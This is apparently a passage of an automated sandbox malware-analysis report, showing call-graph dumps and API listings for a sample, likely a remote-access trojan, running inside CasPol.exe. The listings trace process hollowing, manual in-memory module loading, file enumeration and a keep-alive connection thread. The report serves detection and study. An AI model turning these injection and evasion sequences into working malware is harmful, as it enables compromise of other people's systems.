401eea 11 API calls 53067->53069 53071 401eea 11 API calls 53068->53071 53070 41225c 53069->53070 53073 401eea 11 API calls 53070->53073 53072 4123a4 53071->53072 53074 401eea 11 API calls 53072->53074 53073->53051 53075 4123b0 53074->53075 53076 401eea 11 API calls 53075->53076 53077 4123bc 53076->53077 53078 401eea 11 API calls 53077->53078 53079 4123c8 53078->53079 53080 401eea 11 API calls 53079->53080 53081 4123d4 53080->53081 53082 401eea 11 API calls 53081->53082 53083 4123e0 53082->53083 53084 401eea 11 API calls 53083->53084 53085 411c50 53084->53085 53085->52943 53087 412435 53086->53087 53089 412406 53086->53089 53088 412444 53087->53088 53108 10001c5b 53087->53108 53090 403b40 28 API calls 53088->53090 53105 410b0d 53089->53105 53092 412450 53090->53092 53094 401eea 11 API calls 53092->53094 53096 4120f4 53094->53096 53096->52981 53099 41aee5 53098->53099 53100 401f86 28 API calls 53099->53100 53101 412131 53100->53101 53101->52990 53102->53024 53103->53032 53104->53019 53113 410b19 53105->53113 53109 10001c6b ___scrt_fastfail 53108->53109 53160 100012ee 53109->53160 53111 10001c87 53111->53088 53112 410d8d 22 API calls ___crtLCMapStringA 53112->53087 53144 4105b9 53113->53144 53115 410b38 53117 4105b9 SetLastError 53115->53117 53131 410c1f SetLastError 53115->53131 53141 410b15 53115->53141 53119 410b5f 53117->53119 53118 410bbf GetNativeSystemInfo 53120 410bd6 53118->53120 53119->53118 53119->53119 53119->53131 53119->53141 53120->53131 53147 410abe VirtualAlloc 53120->53147 53122 410bfe 53123 410c26 GetProcessHeap HeapAlloc 53122->53123 53157 410abe VirtualAlloc 53122->53157 53125 410c3d 53123->53125 53126 410c4f 53123->53126 53158 410ad5 VirtualFree 53125->53158 53127 4105b9 SetLastError 53126->53127 53130 410c98 53127->53130 53128 410c16 53128->53123 53128->53131 53132 410d45 53130->53132 53148 410abe VirtualAlloc 53130->53148 53131->53141 53159 410eb0 GetProcessHeap HeapFree 53132->53159 53135 410cb1 ctype 53149 4105cc SetLastError ctype ___scrt_fastfail 53135->53149 53137 410cdd 53137->53132 53150 410975 24 API calls 53137->53150 53139 410d04 53139->53132 53151 410769 53139->53151 53141->53112 53142 410d0f 53142->53132 53142->53141 53143 410d3a SetLastError 53142->53143 53143->53132 53145 4105c8 53144->53145 53146 4105bd SetLastError 53144->53146 53145->53115 53146->53115 53147->53122 53148->53135 53149->53137 53150->53139 53155 410790 53151->53155 53152 41087f 53153 4106d3 VirtualProtect 53152->53153 53154 410891 53153->53154 53154->53142 53155->53152 53155->53154 53156 4106d3 VirtualProtect 53155->53156 53156->53155 53157->53128 53158->53131 53159->53141 53161 10001324 ___scrt_fastfail 53160->53161 53162 100013b7 GetEnvironmentVariableW 53161->53162 53186 100010f1 53162->53186 53165 100010f1 57 API calls 53166 10001465 53165->53166 53167 100010f1 57 API calls 53166->53167 53168 10001479 53167->53168 53169 100010f1 57 API calls 53168->53169 53170 1000148d 53169->53170 53171 100010f1 57 API calls 53170->53171 53172 100014a1 53171->53172 53173 100010f1 57 API calls 53172->53173 53174 100014b5 lstrlenW 53173->53174 53175 100014d2 53174->53175 53176 100014d9 lstrlenW 53174->53176 53175->53111 53177 100010f1 57 API calls 53176->53177 53178 10001501 lstrlenW lstrcatW 53177->53178 53179 100010f1 57 API calls 53178->53179 53180 10001539 lstrlenW lstrcatW 53179->53180 53181 100010f1 57 API calls 53180->53181 53182 1000156b lstrlenW lstrcatW 53181->53182 53183 100010f1 57 API calls 53182->53183 53184 1000159d lstrlenW lstrcatW 53183->53184 53185 100010f1 57 API calls 53184->53185 53185->53175 53187 10001118 ___scrt_fastfail 53186->53187 53188 10001129 lstrlenW 53187->53188 53189 10002c40 ___scrt_fastfail 53188->53189 53190 10001148 lstrcatW lstrlenW 53189->53190 53191 10001177 lstrlenW FindFirstFileW 53190->53191 53192 10001168 lstrlenW 53190->53192 53193 100011a0 53191->53193 53194 100011e1 53191->53194 53192->53191 53195 100011c7 FindNextFileW 53193->53195 53196 100011aa 53193->53196 53194->53165 53195->53193 53198 100011da FindClose 53195->53198 53196->53195 53197 10001000 49 API calls 53196->53197 53197->53196 53198->53194 53200 401fbd 28 API calls 53199->53200 53201 414bbd SetEvent 53200->53201 53202 414bd2 53201->53202 53203 403b60 28 API calls 53202->53203 53204 414bec 53203->53204 53205 401fbd 28 API calls 53204->53205 53206 414bfc 53205->53206 53207 401fbd 28 API calls 53206->53207 53208 414c0e 53207->53208 53209 41afd3 28 API calls 53208->53209 53210 414c17 53209->53210 53211 414d8a 53210->53211 53212 414c37 GetTickCount 53210->53212 53273 414d99 53210->53273 53213 401d8c 11 API calls 53211->53213 53214 41ad56 28 API calls 53212->53214 53216 4161fb 53213->53216 53217 414c4d 53214->53217 53215 414dad 53283 404ab1 83 API calls 53215->53283 53219 401eea 11 API calls 53216->53219 53278 41acb0 GetLastInputInfo GetTickCount 53217->53278 53222 416207 53219->53222 53221 414d7d 53221->53211 53223 401eea 11 API calls 53222->53223 53225 416213 53223->53225 53224 414c54 53226 41ad56 28 API calls 53224->53226 53227 414c5f 53226->53227 53228 41ac62 30 API calls 53227->53228 53229 414c6d 53228->53229 53230 41aed8 28 API calls 53229->53230 53231 414c7b 53230->53231 53232 401d64 28 API calls 53231->53232 53233 414c89 53232->53233 53234 4027ec 28 API calls 53233->53234 53235 414c97 53234->53235 53279 40275c 28 API calls 53235->53279 53237 414ca6 53238 4027cb 28 API calls 53237->53238 53239 414cb5 53238->53239 53280 40275c 28 API calls 53239->53280 53241 414cc4 53242 4027cb 28 API calls 53241->53242 53243 414cd0 53242->53243 53281 40275c 28 API calls 53243->53281 53245 414cda 53246 404468 61 API calls 53245->53246 53247 414ce9 53246->53247 53248 401eea 11 API calls 53247->53248 53249 414cf2 53248->53249 53250 401eea 11 API calls 53249->53250 53251 414cfe 53250->53251 53252 401eea 11 API calls 53251->53252 53253 414d0a 53252->53253 53254 401eea 11 API calls 53253->53254 53255 414d16 53254->53255 53256 401eea 11 API calls 53255->53256 53257 414d22 53256->53257 53258 401eea 11 API calls 53257->53258 53259 414d2e 53258->53259 53260 401e13 11 API calls 53259->53260 53261 414d3a 53260->53261 53262 401eea 11 API calls 53261->53262 53263 414d43 53262->53263 53264 401eea 11 API calls 53263->53264 53265 414d4c 53264->53265 53266 401d64 28 API calls 53265->53266 53267 414d57 53266->53267 53268 43a5f7 39 API calls 53267->53268 53269 414d64 53268->53269 53270 414d69 53269->53270 53271 414d8f 53269->53271 53274 414d82 53270->53274 53275 414d77 53270->53275 53272 401d64 28 API calls 53271->53272 53272->53273 53273->53211 53273->53215 53277 404915 104 API calls 53274->53277 53282 4049ba 81 API calls 53275->53282 53277->53211 53278->53224 53279->53237 53280->53241 53281->53245 53282->53221 53283->53221 53284->52814 53285->52819 53286->52821 53289 40cc3f 53288->53289 53290 403b9e 28 API calls 53289->53290 53291 40ca3a 53290->53291 53292 402860 53291->53292 53294 40286f 53292->53294 53293 4028b1 53301 402daf 53293->53301 53294->53293 53297 4028a6 53294->53297 53296 4028af 53296->52407 53300 402d68 28 API calls 53297->53300 53299->52387 53300->53296 53302 402dbb 53301->53302 53303 4030f7 28 API calls 53302->53303 53304 402dcd 53303->53304 53304->53296 53306 40e56a 53305->53306 53307 4124b7 3 API calls 53306->53307 53308 40e60e 53306->53308 53311 40e5fe Sleep 53306->53311 53327 40e59c 53306->53327 53307->53306 53310 4082dc 28 API calls 53308->53310 53309 4082dc 28 API calls 53309->53327 53313 40e619 53310->53313 53311->53306 53312 41ae18 28 API calls 53312->53327 53315 41ae18 28 API calls 53313->53315 53316 40e625 53315->53316 53340 412774 14 API calls 53316->53340 53319 401e13 11 API calls 53319->53327 53320 40e638 53321 401e13 11 API calls 53320->53321 53323 40e644 53321->53323 53322 401f66 28 API calls 53322->53327 53324 401f66 28 API calls 53323->53324 53325 40e655 53324->53325 53328 4126d2 14 API calls 53325->53328 53326 4126d2 14 API calls 53326->53327 53327->53309 53327->53311 53327->53312 53327->53319 53327->53322 53327->53326 53338 40bf04 73 API calls ___scrt_fastfail 53327->53338 53339 412774 14 API calls 53327->53339 53329 40e668 53328->53329 53341 411699 TerminateProcess WaitForSingleObject 53329->53341 53331 40e670 ExitProcess 53342 411637 62 API calls 53336->53342 53339->53327 53340->53320 53341->53331 53343 41569e 53344 401d64 28 API calls 53343->53344 53345 4156b3 53344->53345 53346 401fbd 28 API calls 53345->53346 53347 4156bb 53346->53347 53348 401d64 28 API calls 53347->53348 53349 4156cb 53348->53349 53350 401fbd 28 API calls 53349->53350 53351 4156d3 53350->53351 53354 411aed 53351->53354 53355 4041f1 3 API calls 53354->53355 53356 411b01 53355->53356 53357 40428c 97 API calls 53356->53357 53358 411b09 53357->53358 53359 4027ec 28 API calls 53358->53359 53360 411b22 53359->53360 53361 4027cb 28 API calls 53360->53361 53362 411b2c 53361->53362 53363 404468 61 API calls 53362->53363 53364 411b36 53363->53364 53365 401eea 11 API calls 53364->53365 53366 411b3e 53365->53366 53367 4045d5 261 API calls 53366->53367 53368 411b4c 53367->53368 53369 401eea 11 API calls 53368->53369 53370 411b54 53369->53370 53371 401eea 11 API calls 53370->53371 53372 411b5c 53371->53372

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                  • API String ID: 384173800-625181639
                                                                                                                  • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                  • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                                                                                                                  • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                  • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 447 417245-417262 448 417266-4172d9 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 447->448 449 4175cd 448->449 450 4172df-4172e6 448->450 452 4175cf-4175d9 449->452 450->449 451 4172ec-4172f3 450->451 451->449 453 4172f9-4172fb 451->453 453->449 454 417301-41732d call 436060 * 2 453->454 454->449 459 417333-41733e 454->459 459->449 460 417344-417374 CreateProcessW 459->460 461 4175c7 GetLastError 460->461 462 41737a-4173a2 VirtualAlloc Wow64GetThreadContext 460->462 461->449 463 417593-4175c5 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->463 464 4173a8-4173c8 ReadProcessMemory 462->464 463->449 464->463 465 4173ce-4173ee NtCreateSection 464->465 465->463 466 4173f4-417401 465->466 467 417403-41740e NtUnmapViewOfSection 466->467 468 417414-417436 NtMapViewOfSection 466->468 467->468 469 417477-41749e GetCurrentProcess NtMapViewOfSection 468->469 470 417438-417466 VirtualFree NtClose TerminateProcess 468->470 472 417591 469->472 473 4174a4-4174a6 469->473 470->449 471 41746c-417472 470->471 471->448 472->463 474 4174a8-4174ac 473->474 475 4174af-4174d6 call 435ae0 473->475 474->475 478 417516-417520 475->478 479 4174d8-4174e2 475->479 481 417522-417528 478->481 482 41753e-417542 478->482 480 4174e6-417509 call 435ae0 479->480 493 41750b-417512 480->493 481->482 486 41752a-41753b call 417651 481->486 483 417544-417560 WriteProcessMemory 482->483 484 417566-41757d Wow64SetThreadContext 482->484 483->463 488 417562 483->488 484->463 489 41757f-41758b ResumeThread 484->489 486->482 488->484 489->463 492 41758d-41758f 489->492 492->452 493->478
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
                                                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                                  • NtClose.NTDLL(?), ref: 0041744A
                                                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                  • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                  • NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
                                                                                                                  • NtClose.NTDLL(?), ref: 004175B6
                                                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                  • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                  • API String ID: 3150337530-3035715614
                                                                                                                  • Opcode ID: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                  • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                                                                                                                  • Opcode Fuzzy Hash: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                  • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1484 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1491 10001177-1000119e lstrlenW FindFirstFileW 1484->1491 1492 10001168-10001172 lstrlenW 1484->1492 1493 100011a0-100011a8 1491->1493 1494 100011e1-100011e9 1491->1494 1492->1491 1495 100011c7-100011d8 FindNextFileW 1493->1495 1496 100011aa-100011c4 call 10001000 1493->1496 1495->1493 1498 100011da-100011db FindClose 1495->1498 1496->1495 1498->1494
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1083526818-0
                                                                                                                  • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                  • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                  • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                  • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                    • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                    • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                  • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                  • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                  • API String ID: 2281282204-3981147832
                                                                                                                  • Opcode ID: 8b57bce22a9f6d76fda62625c2c9eda57b428cac8fd47ef44d4eceb6ac03292f
                                                                                                                  • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                                                                                                                  • Opcode Fuzzy Hash: 8b57bce22a9f6d76fda62625c2c9eda57b428cac8fd47ef44d4eceb6ac03292f
                                                                                                                  • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                  • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3525466593-0
                                                                                                                  • Opcode ID: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                                                                                  • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                                                                                                                  • Opcode Fuzzy Hash: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                                                                                  • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                                                                                                                  APIs
                                                                                                                  • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                  Strings
                                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Create$EventLocalThreadTime
                                                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                  • API String ID: 2532271599-1507639952
                                                                                                                  • Opcode ID: 1ad6a2ad94e4569e09952a4ded336d3c2f1fb57938f862c7e125ba59f66ea787
                                                                                                                  • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                                                                                                                  • Opcode Fuzzy Hash: 1ad6a2ad94e4569e09952a4ded336d3c2f1fb57938f862c7e125ba59f66ea787
                                                                                                                  • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                                                                                                                  APIs
                                                                                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                                                                                                                  • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                                                                                                                  Memory Dump Source
